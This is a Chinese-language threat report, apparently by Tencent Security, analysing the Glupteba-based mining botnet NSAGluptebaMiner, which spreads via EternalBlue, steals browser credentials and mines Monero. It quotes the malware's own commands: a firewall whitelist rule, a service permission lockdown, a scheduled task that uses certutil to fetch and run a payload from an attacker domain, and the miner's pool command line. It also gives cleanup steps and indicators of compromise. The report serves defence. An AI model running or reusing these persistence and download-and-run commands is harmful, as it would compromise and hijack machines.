威胁研究正文

挖矿僵尸网络NSAGluptebaMiner利用永恒之蓝漏洞传播

2020-04-17 15:16:35

腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2。

一、背景

腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2

cloudnet.exe原来是Glupteba恶意木马,Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现,20186月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。

当前NSAGluptebaMiner版本具有以下特征:

1.     利用永恒之蓝漏洞攻击传播;

2.     安装计划任务持久化,任务利用certutil.exe下载木马;

3.     利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传;

4.     绕过UAC,以管理员权限和系统权限运行,将木马程序加入防火墙策略白名单、Windows Defender查杀白名单;

5.     安装驱动Winmon.sysWinmonFS.sysWinmonProcessMonitor.sys对木马进行保护;

6.     运行门罗币挖矿程序wup.exe

7.     利用组件cloudnet.exe构建僵尸网络;

8.     连接远程服务器,接收指令完成远控操作;

9.     通过比特币交易数据更新C2地址。

NSAGlupetaMiner僵尸网络攻击流程图

二、详细分析

漏洞攻击成功后,Payload首先下载app.exe在内存中执行PE文件,并且将该文件释放到C:\Windows\rss\csrss.execsrss.exe是一个木马下载器,采用Go编程语言编写。下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户,以及一些以二进制形式硬编码的信息来初始化配置信息,然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>8位随机字符)来存储所有获取的信息。(之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp

首先会检测是否在虚拟机中执行。


然后判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。



”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件,并加载对应的驱动程序:

Winmon.sys用于隐藏对应PID进程;

WinmonFS.sys隐藏指定文件或目录;

WinmonProcessMonitor.sys查找指定进程,并关闭。



维护以系统服务的方式启动的木马(检查服务、下载安装服务、更新服务、删除服务)。




下载永恒之蓝漏洞漏洞利用程序,利用漏洞攻击局域网机器。



下载矿机和挖矿代理配置信息。



获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash



handleCommand函数中实现后门功能,包括下载文件、程序执行等。



各函数及对应操作如下:

函数

操作

GetAppName

获取App

IsAdmin

是否Admin账号

ProcessIsRunning

进程是否运行

Update

更新

Exec

执行程序

Download

下载

DownloadAndRun

下载并执行

DownloadAndRunExtended

下载并执行扩展

Exit

退出

UpdateData

更新数据

UpdateCloudnet

更新cloudnet.exe

StopWUP

停止挖矿程序wup.exe

UpdateService

更新服务

GetLogfileProxy

读取日志文件\proxy\t

GetLogfileI2Pd

读取日志文件\i2pd\i2pd.log

Notify

开启心跳包,在指定的时间间隔进行上报

NotifyHost

上报主机

EventExists

判断event是否存在

MutexExists

判断Mutuex是否存在

RegistryGetStartup

注册自启动项

VerifySignature

验证文件签名

RegistryGetStartupSignatures

验证启动项文件签名

VerifyProcessesSignatures

验证进程文件签名

GetUnverifiedFiles

上报未签名的文件

GetStatsWUP

获取挖矿木马统计信息

UploadFile

上传文件

Install

下载并安装

SC

截屏

UpdateCDN

更新C2

DiscoverElectrum

使用硬编码的以太币钱包,读取区块链交易数据

DiscoverBlockchaincom

从区块链交易数据中获取加密的新的C2地址

设置防火墙规则,将csrss.exe添加到白名单:

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes



写入windows defender规则,添WinmonWinmonFSWinmonProcessMonitor加到白名单:

cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)



安装名为“ScheduledUpdate”的计划任务,任务内容为:每当用户登陆时,利用certutil.exe下载app.exe,保存为scheduled.exe并运行:

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F



灵活更新C2:通过公开的列表查询Electrum比特币钱包服务器,使用硬编码的hash值查询对应的区块链脚本hash记录,对返回的数据进行AES解密得到新的C2地址。


组件updateprofile.exe为密码提取器,也使用Go编写,并使用UPX壳保护。

运行后搜集包括ChromeOperaYandex浏览器的cookie、历史记录和其他配置文件中的账号密码,打包上传到远程服务器。



组件cloudnet.exe负责构建僵尸网络, 会读取注册表中存放的UUID进行校验,在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息,移动自身到“\cloudnet\”文件夹下,连接C2服务器,接收远控指令。


组件wup.exe负责挖矿门罗币,csrss.exe启动wup.exe时传递参数C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x --nicehash -k --api-port=3433 --api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b --http-port=3433 --http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b --donate-level=1 --randomx-wrmsr=-1 –background

Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件,最后执行另一同名文件

C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿,该文件由开源挖矿程序XMRig编译。


三、安全建议

企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。


也可参考以下步骤手动完成清理:

检查以下各项,如有进行清除:

目录和文件:

C:\Users\Administrator\AppData\LoCal\Temp\Csrss\smb\

C:\users\administrator\appdata\loCal\temp\Csrss\

C:\Windows\rss\Csrss.exe

C:\Windows\windefender.exe

C:\Windows\System32\drivers\Winmon.sys

C:\Windows\System32\drivers\WinmonFS.sys

C:\Windows\System32\drivers\WinmonProCessMonitor.sys

C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe

C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe

C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe

C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe

C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe

注册表:

HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp

HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random>

HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet

HKEY_CURRENT_USER\Software\MiCrosoft\<random>

HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon

HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS

HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor

HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost

计划任务:

ScheduledUpdate

推荐企业用户部署腾讯安全完整解决方案提升系统安全性。

腾讯安全解决方案部署示意图(图片可放大)

企业用户可根据业务节点拦截位置部署适当的安全产品,并根据腾讯安全威胁情报中心提供的情报数据配置各节点联防联动、统一协调管理,可参考下表选择:

拦截

位置

安全产品

解决方案

云上

业务

腾讯云T-Sec

安全运营中心(云SOC

免费试用云SOC产品

云上业务的事前安全预防、事中监测与威胁检测及事后响应处置。

事前环节:云上资产的自动化动态盘点。识别云上配置风险,云上高危端口及组件的自动化检查。

事中环节:云上安全产品告警统一监测,流量威胁感知,识别云上攻击和失陷主机行为。

事后环节:对特定安全事件实现自动化响应,云上安全日志审计与调查溯源。

云上安全态势及安全成果的可视化展示。

云防火墙

Cloud FirewallCFW

一款基于公有云环境下的 SaaS 化防火墙,主要为用户提供互联网边界的防护,解决云上访问控制的统一管理与日志审计的安全与管理需求。

腾讯T-Sec

安全运营中心(专有云)


扫码了解更多信息

以安全检测、事件关联及智能分析为核心功能,并以腾讯威胁情报、3D可视化为特色。通过海量数据多维度分析、对威胁及时预警并做出智能处置。

适用于多种安全运营管理场景,帮助企业打造全网安全态势可知、可见、可控的闭环。

https://cloud.tencent.com/product/soc-private

腾讯T-Sec

威胁情报云查服务

SaaS

SaaS形式自动化威胁情报查询产品:

满足对IP/Domain/文件等对象的威胁查询、SaaS形式威胁情报查询及溯源产品“T-Sec高级威胁追溯系统”。

https://cloud.tencent.com/product/tics

腾讯T-Sec

威胁情报平台(TIP

将腾讯安全最新的威胁情报能力变成一套可本地部署的威胁情报管理平台,帮助企业在内网/专网/私有云等环境实现威胁情报管理和查询。

根据威胁情报提供的IOCs信息,将失陷数据同步到网络中的各个设备,对危险访问、入侵流量、恶意文件进行检测、识别和拦截。

腾讯TIP平台的IOCs信息可自动同步,也支持管理员手动添加。

腾讯T-Sec

高级威胁追溯系统

进行线索研判、攻击定性和关联分析,追溯威胁源头,有效预测威胁的发生并及时预警。

https://cloud.tencent.com/product/atts

网络

资产

风险

检测

腾讯T-Sec 网络资产风险检测系统(腾讯御知)

免费试用腾讯御知

全面检测企业网络资产是否受安全漏洞影响。

可全方位监控企业网站、云主机、小程序等资产存在的风险,包含弱口令检测、Web 漏洞扫描、违规敏感内容检测、网站篡改检测、挂马挖矿检测等多类资产风险。

http://yuzhi.qq.com

入侵

流量

检测

腾讯T-Sec

高级威胁检测系统

(腾讯御界)

基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。

可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。

https://cloud.tencent.com/product/nta

主机

终端

保护

腾讯T-Sec终端安全管理系统(御点)

拦截病毒木马攻击终端系统;

支持集中检测、修复各终端系统存在的安全漏洞;

支持启用文档守护者功能自动备份重要资料文件。

https://s.tencent.com/product/yd/index.html

个人用户推荐使用腾讯电脑管家保护终端系统。

安全

服务

腾讯安全定期巡检服务

由腾讯安全团队专业工程师提供定期巡检服务,对客户采购的全系列腾讯安全解决方案的运行维护情况提供详细专业的技术报告。

更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/

IOCs

Domain

biggames.club

biggames.online

deepsound.live

sndvoices.com

2makestorage.com

infocarnames.ru

URL

http[:]//biggames.club/app/app.exe

https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe

md5

b1c081429c23e3ef0268fd33e2fe79f9

da75bc9d4d74a7ae4883bfa66aa8e99b

00201e5ad4e27ff63ea32fb9a9bb2c2e

6918fd63f9ec3126b25ce7f059b7726a

fcf8643ff7ffe5e236aa957d108958c9

9b47b9f19455bf56138ddb81c93b6c0c

0dbecc91932301ccc685b9272c717d61

矿池:premiumprice.shop:50001

参考链接:

https://www.freebuf.com/articles/system/172929.html

https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/

在线咨询

方案定制